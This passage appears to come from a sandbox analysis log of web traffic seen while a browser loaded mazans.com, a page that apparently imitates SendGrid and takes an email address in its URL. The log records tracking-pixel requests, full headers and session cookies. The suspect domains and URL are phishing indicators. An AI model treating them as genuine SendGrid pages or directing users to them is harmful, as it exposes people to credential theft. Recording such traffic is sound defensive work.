Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
    Source: global trafficHTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46a56a82b9eec47679c796e092818c5871d61eb72bffeb1ba131be20ecca7478c31db6bda508e1547f77303fd1f564c2acf503ed79ffca8328828bf7d8557ec4b7274a7d43169230121e118f58109ac5d6ead83c6771e217dcf965d78c9df014b3545700015a7902c7e7d17c7ab1f28cef2ea2b93e745711b3eb7b4e7c1d965b4cfd908e2529d516b3098e89ae6a231c3daea6dc1345ad0f0c8241f14fe3467a0910678fc86ae668504f745b7980a870d97dd75d66071d2d964d27a8f8fb9b9deb1a00779a972a9dc8f5b4c4dc8ce6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bccd1bcd920a11eca4cdecee1f9eb4b1a2c281fbe3415d21e95b94f4057c8928641bd7605d6d6fea66a87718def6c6628e7cca238bab41d1aa59dc225b332a107d0d9dc7e7da397a50991d478b95bfc4f7823b7e9ac1ea0bf3b7000998c00e2e2abcc88d442ba5269b5e9819e23a9a17d8cd11e6fa77a0c0888cfa303bbb99453ac67fda9facb952d93560040f86695d51b6a05e8aed11c99c99d62da4e3d46974341ac76afe50d123e7807b8a200161172877148c469cc3770cab65c0bbe761888b1cf02b20fe552573c18a845d03b12fe78412c615655508ae312d82afd468d7457ec7d401abdec1edc01f8f1f472814f277265280824c01f82eedfedd3fd090bf5f4f76a3763257479c4212f493ef181193626dc1c8c4128bc6b0cf4530e366ee156057d05c723cc7da0c408bd6ffc4bbf16aa148fa31867e98d155d6e7ae7a6bacd30d&cri=BaOHhi2XtN&ts=2363&cb=1731515355030 HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /pixel;r=914973261;labels=_fp.event.Page%20not%20found%20%7C%20SendGrid;rf=0;a=p-de_F6qVUp9bug;url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED;ref=https%3A%2F%2Fsepedatua.com%2F;ns=0;ce=1;qjs=1;qv=6cdb9339-20241109062824;dst=1;et=1731515356482;tzo=300;ogl=type.website%2Csite_name.SendGrid%2Curl.https%3A%2F%2Fsendgrid%252Ecom%2Fen-us%2F404%2Ctitle.Page%20not%20found%20%7C%20SendGrid%20%2Cdescription.%2Cimage.https%3A%2F%2Fsendgrid%252Ecom%2Fcontent%2Fdam%2Fsendgrid%2Fcore-assets%2Fsocial%2Fsendgrid-default-og;ses=866c6b77-1f69-4857-b1ec-19e8d7f84073;d=mazans.com;uht=2;fpan=1;fpa=P0-2005580295-1731515356484;pbc=;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pageview?ex=&dt=2445&pvt=n&la=en-US&uc=0&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&dr=https%3A%2F%2Fsepedatua.com%2F&dw=1263&dh=44898&ww=1280&wh=907&sw=1280&sh=1024&uu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&sn=1&hd=1731515356&v=32bb33fe4ed6e6973ce6df5d79a84ef3f564da91&pid=84712&pn=1&happid=1541905715&hsid=5313631937644667&huu=6112782573225535&r=521041 HTTP/1.1Host: c.contentsquare.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/0.7.49/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
    Source: global trafficHTTP traffic detected: GET /v1/p HTTP/1.1Host: api.segment.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/923239173/?random=1731515353497&cv=11&fst=1731513600000&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d_FlbTcxAkA3WYiine-jPApibz-O4Xg&random=4124225919&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger=navigation-sourceReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1040773425961662?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /pixel;r=914973261;labels=_fp.event.Page%20not%20found%20%7C%20SendGrid;rf=0;a=p-de_F6qVUp9bug;url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED;ref=https%3A%2F%2Fsepedatua.com%2F;ns=0;ce=1;qjs=1;qv=6cdb9339-20241109062824;dst=1;et=1731515356482;tzo=300;ogl=type.website%2Csite_name.SendGrid%2Curl.https%3A%2F%2Fsendgrid%252Ecom%2Fen-us%2F404%2Ctitle.Page%20not%20found%20%7C%20SendGrid%20%2Cdescription.%2Cimage.https%3A%2F%2Fsendgrid%252Ecom%2Fcontent%2Fdam%2Fsendgrid%2Fcore-assets%2Fsocial%2Fsendgrid-default-og;ses=866c6b77-1f69-4857-b1ec-19e8d7f84073;d=mazans.com;uht=2;fpan=1;fpa=P0-2005580295-1731515356484;pbc=;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: mc=6734d3de-eac9d-cb333-2df9d
    Source: global trafficHTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46a56a82b9eec47679c796e092818c5871d61eb72bffeb1ba131be20ecca7478c31db6bda508e1547f77303fd1f564c2acf503ed79ffca8328828bf7d8557ec4b7274a7d43169230121e118f58109ac5d6ead83c6771e217dcf965d78c9df014b3545700015a7902c7e7d17c7ab1f28cef2ea2b93e745711b3eb7b4e7c1d965b4cfd908e2529d516b3098e89ae6a231c3daea6dc1345ad0f0c8241f14fe3467a0910678fc86ae668504f745b7980a870d97dd75d66071d2d964d27a8f8fb9b9deb1a00779a972a9dc8f5b4c4dc8ce6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bccd1bcd920a11eca4cdecee1f9eb4b1a2c281fbe3415d21e95b94f4057c8928641bd7605d6d6fea66a87718def6c6628e7cca238bab41d1aa59dc225b332a107d0d9dc7e7da397a50991d478b95bfc4f7823b7e9ac1ea0bf3b7000998c00e2e2abcc88d442ba5269b5e9819e23a9a17d8cd11e6fa77a0c0888cfa303bbb99453ac67fda9facb952d93560040f86695d51b6a05e8aed11c99c99d62da4e3d46974341ac76afe50d123e7807b8a200161172877148c469cc3770cab65c0bbe761888b1cf02b20fe552573c18a845d03b12fe78412c615655508ae312d82afd468d7457ec7d401abdec1edc01f8f1f472814f277265280824c01f82eedfedd3fd090bf5f4f76a3763257479c4212f493ef181193626dc1c8c4128bc6b0cf4530e366ee156057d05c723cc7da0c408bd6ffc4bbf16aa148fa31867e98d155d6e7ae7a6bacd30d&cri=BaOHhi2XtN&ts=2363&cb=1731515355030 HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/923239173/?random=1731515353497&cv=11&fst=1731513600000&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d_FlbTcxAkA3WYiine-jPApibz-O4Xg&random=4124225919&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.com HTTP/1.1Host: heapanalytics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /h?a=1541905715&u=6112782573225535&v=2199469863289764&s=5313631937644667&b=web&tv=4.0&z=0&h=%2FWEB-ID-6672849687924%2Fzerobot%2F&q=%3Femail%3DEMAIL_REDACTED&d=mazans.com&t=Page%20not%20found%20%7C%20SendGrid&r=https%3A%2F%2Fsepedatua.com%2F&k=Device%20screen%20resolution&k=1280%20x%201024&k=Inner%20window%20dimensions&k=1280%20x%20907&ts=1731515354042&srp=cs%3A84712%252F392b47b9-fdc5-a91a-dc6e-b9b5c392f625%252F1%252F1%252F2520&cspid=84712&cspvid=1&cssn=1&csts=2520&csuu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&ubv=117.0.5938.149&upv=10.0.0&sch=907&scw=1280&st=1731515359048&lv=4.23.4&ld=cdn.heapanalytics.com HTTP/1.1Host: heapanalytics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /content/dam/sendgrid/core-assets/social/favicon-32x32.png HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9; at_check=true; mbox=session#ead54cbe71824480b6163d2cf14e5e54#1731517211|PC#ead54cbe71824480b6163d2cf14e5e54.37_0#1794760151; _gcl_au=1.1.1581689275.1731515350; _gd_visitor=68a6beac-571c-486f-896d-0de3508c5af9; _gd_session=5109dfa4-7e15-4de3-89f4-70d06284fa1b; TAsessionID=57cd44ce-3945-49f8-b363-1f9e5ecbe175|NEW; notice_behavior=implied,eu; _cq_duid=1.1731515352.vVOwxXK4AgFUHCBp; _cq_suid=1.1731515352.purk0nRGidINit9L; _mkto_trk=id:294-TKB-300&token:_mch-mazans.com-1731515352683-23262; _an_uid=0; _ga_8W5LR442LD=GS1.1.1731515352.1.0.1731515352.0.0.0; _ga=GA1.1.70095159.1731515353; _rdt_uuid=1731515353676.59612d52-27d8-4d62-91ae-7a523b33ca67; _hp2_id.1541905715=%7B%22userId%22%3A%226112782573225535%22%2C%22pageviewId%22%3A%222199469863289764%22%2C%22sessionId%22%3A%225313631937644667%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; _uetsid=6c20c730a1dc11ef92b555071f46574f; _uetvid=6c2123d0a1dc11ef9ad55fff4e91da09; ajs_anonymous_id=a6484a29-d020-4de6-a9ba-3d1267788ab8; _fbp=fb.1.1731515356382.644741780521606255; _cs_c=0; _cs_id=392b47b9-fdc5-a91a-dc6e-b9b5c392f625.1731515356.1.1731515356.1731515356.1728518226.1765679356523.1; _cs_s=1.0.0.9.1731517156537; _ga_8W5LR442L=GS1.1.1731515356.1.0.1731515356.0.0.0; _clck=1aw3k49%7C2%7Cfqu%7C0%7C1778; 